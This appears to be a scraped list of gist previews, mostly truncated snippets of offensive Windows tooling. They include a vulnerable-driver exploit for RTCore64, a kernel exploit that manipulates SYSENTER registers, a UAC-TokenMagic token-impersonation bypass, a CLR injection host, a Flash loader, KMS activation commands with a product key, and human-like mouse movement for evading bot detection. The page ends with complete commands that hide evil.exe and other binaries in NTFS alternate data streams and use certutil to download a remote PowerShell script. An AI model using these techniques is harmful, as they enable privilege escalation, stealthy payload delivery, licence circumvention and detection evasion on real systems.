| #!/usr/local/bin/python | |
| import os, sys, math, hmac, operator, time, random, urllib2, md5 | |
| class AES(object): | |
| # Rijndael S-box | |
| sbox = [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, | |
| 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, | |
| 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, | |
| 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, |
| #include "stdafx.h" | |
| // vulnerable driver device name | |
| #define EXPL_DEVICE_PATH "\\\\.\\Global\\RTCore64" | |
| // vulnerable driver service and file name | |
| #define EXPL_DRIVER_NAME "RTCore64.sys" | |
| #define EXPL_SERVICE_NAME "RTCore64" | |
| // vulnerable driver IOCTL codes |
| $Win32 = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Win32 { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32")] |
| import sys, os, mmap, subprocess | |
| from struct import pack, unpack | |
| from ctypes import * | |
| IA32_SYSENTER_ESP = 0x175 | |
| IA32_SYSENTER_EIP = 0x176 | |
| class PyObj(Structure): | |
| _fields_ = [( 'ob_refcnt', c_size_t ), |
| cscript.exe %windir%\system32\slmgr.vbs /rilc | |
| cscript.exe %windir%\system32\slmgr.vbs /upk | |
| cscript.exe %windir%\system32\slmgr.vbs /ckms | |
| cscript.exe %windir%\system32\slmgr.vbs /cpky | |
| cscript.exe %windir%\system32\slmgr.vbs /ipk VK7JG-NPHTM-C97JM-9MPGT-3V66T | |
| sc config LicenseManager start= auto & net start LicenseManager | |
| sc config wuauserv start= auto & net start wuauserv | |
| clipup -v -o -altto c:\ |
| # Using B-spline for simulate humane like mouse movments | |
| def human_like_mouse_move(self, action, start_element): | |
| points = [[6, 2], [3, 2],[0, 0], [0, 2]]; | |
| points = np.array(points) | |
| x = points[:,0] | |
| y = points[:,1] | |
| t = range(len(points)) |
| function UAC-TokenMagic { | |
| <# | |
| .SYNOPSIS | |
| Based on James Forshaw's three part post on UAC, linked below, and possibly a technique | |
| used by the CIA! | |
| Essentially we duplicate the token of an elevated process, lower it's mandatory | |
| integrity level, use it to create a new restricted token, impersonate it and | |
| use the Secondary Logon service to spawn a new process with High IL. Like | |
| playing hide-and-go-seek with tokens! ;)) |
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
| package | |
| { | |
| import flash.display.Loader; | |
| import flash.display.Sprite; | |
| import flash.events.Event; | |
| import flash.events.IOErrorEvent; | |
| import flash.events.SecurityErrorEvent; | |
| import flash.net.URLLoader; | |
| import flash.net.URLRequest; | |
| import flash.system.Capabilities; |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab